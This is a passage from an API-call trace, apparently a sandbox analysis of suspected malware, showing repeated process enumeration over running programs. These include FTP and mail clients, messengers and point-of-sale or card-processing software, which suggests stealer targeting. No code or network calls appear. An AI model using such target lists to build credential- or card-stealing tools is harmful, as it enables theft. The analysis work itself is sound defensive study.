hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0246.973] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0246.976] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.978] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0246.979] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0246.993] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0246.994] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0246.996] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0246.998] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0246.999] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0247.001] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.002] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.004] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0247.005] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0247.007] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0247.008] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0247.010] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0247.011] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0247.031] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0247.033] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0247.034] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0247.036] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0247.037] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0247.038] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0247.040] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0247.041] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0247.043] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0247.047] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0247.049] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0247.050] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0247.052] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0247.054] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0247.056] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0247.058] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0247.063] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0247.065] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0247.066] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0247.068] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0247.070] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0247.072] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0247.137] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0247.140] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0247.141] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0247.143] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0247.145] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0247.147] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0247.149] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0247.151] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0247.153] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0247.157] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0247.159] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0247.162] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0247.163] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0247.165] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0247.167] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0247.173] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0247.175] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0247.177] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0247.179] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0247.182] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0247.236] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0247.238] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0247.240] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0247.242] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0247.244] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0247.245] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0247.250] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0247.252] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0247.254] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0247.255] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0247.257] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0247.258] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0247.260] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0247.261] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0247.266] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0247.268] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0247.270] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0247.271] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.273] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0247.274] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0247.276] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0247.277] CloseHandle (hObject=0x17b0) returned 1 [0247.286] Sleep (dwMilliseconds=0x64) [0247.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x758 [0247.397] Process32First (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0247.398] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 